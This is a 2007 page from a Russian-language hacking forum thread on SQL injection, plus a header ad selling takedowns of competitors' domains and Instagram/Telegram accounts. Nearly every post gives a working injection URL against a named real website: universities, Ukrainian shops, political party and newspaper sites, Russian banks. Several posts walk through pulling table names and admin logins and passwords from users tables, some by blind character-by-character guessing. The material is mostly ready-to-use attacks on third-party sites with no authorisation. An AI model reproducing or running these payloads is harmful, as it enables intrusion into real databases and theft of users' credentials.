УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 275 из 1242

275

Опции темы

Поиск в этой теме

Опции просмотра

#2741

19.07.2007, 01:32

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

Провел на форуме:
7452489

Репутация: 1359

PR=6
inside.tufts.edu

Код:

http://inside.tufts.edu/announce/index.php?t=id&id=-471+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user()),0x3a),0x3a),4,5,6,7,8/*

есть табица users но не могу подобрать колонки

#2742

19.07.2007, 16:20

Y.Dmitriy

Постоянный

Регистрация: 14.03.2007

Сообщений: 367

Провел на форуме:
1392441

Репутация: 161

Отправить сообщение для Y.Dmitriy с помощью ICQ

Отправить сообщение для Y.Dmitriy с помощью AIM

Отправить сообщение для Y.Dmitriy с помощью MSN

Цитата:

http://www.rzhavsky.com/politics.php?chr_id=-1+union+select+user(),database(),version(),4/*

какой-то Украинский политик...

Цитата:

http://www.reznik007.com/?p=-1'

MSSQL

Цитата:

http://www.snarodom.org.ua/index.php?level=1&type=topmenu&section=-5+union+select+1,user()/*

какая-то газетка

Цитата:

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

интернет магазин

Цитата:

http://www.bookshop.ua/Asp/annot.asp?bid=654738'

книжный магазин но тут MSSQL а я в ней не шарю

#2743

19.07.2007, 21:33

Dr.Z3r0

Leaders of The World

Регистрация: 06.07.2007

Сообщений: 246

Провел на форуме:
2030482

Репутация: 1796

Цитата:

какая-то газетка

Цитата:

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

Хех вот я немного раз... это самое... ладно вот:

Код:

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(VERSION()),0x31),0x31),5,6,7,8,9,10,11/*

Ну вот версия 5.0.19-standard ну дальше смотрим имена таблиц и столбцов:

Код:

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x2D,TABLE_NAME,COLUMN_NAME),0x31),0x31),5,6,7,8,9,10,11 FROM INFORMATION_SCHEMA.COLUMNS/*

Ну вот собсно говоря таблица users:

Код:

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x2D,id,login,pass),0x31),0x31),5,6,7,8,9,10,11%20FROM%20users/*

Ну и наскока я понял это админы

Код:

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x2D,id,login,pass),0x31),0x31),5,6,7,8,9,10,11%20FROM users WHERE admin=1/*

Только где админка хрен его...

__________________

Кто я?..

#2744

19.07.2007, 21:34

Termin@L

Участник форума

Регистрация: 07.12.2006

Сообщений: 192

Провел на форуме:
492591

Репутация: 123

Цитата:

интернет магазин
Цитата:
http://www.bookshop.ua/Asp/annot.asp?bid=654738'

книжный магазин но тут MSSQL а я в ней не шарю

здесь insert, сделать по-моему ничего нельзя

#2745

20.07.2007, 08:41

V.I.P

Познающий

Регистрация: 06.04.2007

Сообщений: 77

Провел на форуме:
1062869

Репутация: 136

Отправить сообщение для V.I.P с помощью ICQ

Сайт:www.agricbank.com

Цитата:

http://www.agricbank.com/story.asp?ID=1+or+1=@@version--

#2746

20.07.2007, 12:44

Dr.Z3r0

Leaders of The World

Регистрация: 06.07.2007

Сообщений: 246

Провел на форуме:
2030482

Репутация: 1796

Цитата:

http://www.spu.in.ua/ua/search/?search_word=1'

Социалистическая партия Украины (ток чёт я ту не разобрался)

Там два запроса... Прийдется подбирать по символу:

Код:

http://www.spu.in.ua/ua/search/?search_word=1') UNION SELECT 1 FROM pub WHERE id=IF(ASCII(SUBSTRING(VERSION(),1,1))>'50',1,(SELECT 1 UNION SELECT 2))/*

Кстати это 5 версия там 33 таблицы...
Для супер маньяков можно и поподбирать символы в названиях столбцов:

Код:

http://www.spu.in.ua/ua/search/?search_word=1') UNION SELECT 1 FROM pub WHERE id=IF(ASCII(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),1,1))>100,1,(SELECT 1 UNION SELECT 2))/*

__________________

Кто я?..

#2747

20.07.2007, 13:34

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

Код:

http://ruskino.ru/news/?id=-393+union+select+VERSION(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

#2748

20.07.2007, 15:37

Barsik

Постоянный

Регистрация: 16.01.2005

Сообщений: 300

Провел на форуме:
3463790

Репутация: 726

Отправить сообщение для Barsik с помощью ICQ

Отправить сообщение для Barsik с помощью MSN

Код:

http://www.gaycentral.ru/news/?id=-1+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11/*
http://www.superwriter.net/index.php?current_subsection=-3+UNION+SELECT+1,2,3,4,5,6,7,VERSION(),9/*
http://partytown.ru/music.php?id=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,VERSION(),21/*
http://www.religion.no/bildebase/browse.php?action=overview&col=-9+UNION+SELECT+1,2,convert(concat(username,char(58),password)+using+latin1),4+FROM+arjan.users/*

Mssql

#2749

20.07.2007, 18:14

V.I.P

Познающий

Регистрация: 06.04.2007

Сообщений: 77

Провел на форуме:
1062869

Репутация: 136

Mssql

Ну вот нашарил скулей мелкософта.

Сайт: www.russianlink.com

Код:

http://www.russianlink.com/article1.asp?text=articles&ID=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+NOT+IN+('tbl_dating','tbl_gossip','tbl_cards','tbl_girls','D99_Tmp','dtproperties','sysconstraints','syssegments','tbl_album','tbl_articles'))--

//лень перебирать все таблицы.

Сайт: www.bcs.ru

Код:

http://www3.bcs.ru/webclients/chips/showonenew.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

Сайт: www.appartment.ru

http://www.appartment.ru/app.asp?act=press&id=-1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATI ON_SCHEMA.TABLES)--

Сайт: www.nezachetov.net

Код:

http://nezachetov.net/shop/ozon/book/zakaz.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

Сайт: www.volgogradinfo.ru

Код:

http://www.volgogradinfo.ru/shop/ozon/book/zakaz.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

#2750

20.07.2007, 22:18

ENFIX

Участник форума

Регистрация: 06.06.2006

Сообщений: 213

Провел на форуме:
1628290

Репутация: 474

Отправить сообщение для ENFIX с помощью ICQ

ггг =) 84 столбца =-O такого я еще не встречал )

Код:

http://www.csc.ncsu.edu/directories/faculty_info.php?id=-1670+UNION+SELECT+1,2,3,4,5,user(),7,8,database(),version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,now(),sin(pi()-2),32,33,34,35,36,37,38,39,40,41,42,43,44,45,446,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85/*

Страница 275 из 1242

275

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 11 (пользователей: 0 , гостей: 11)

Быстрый переход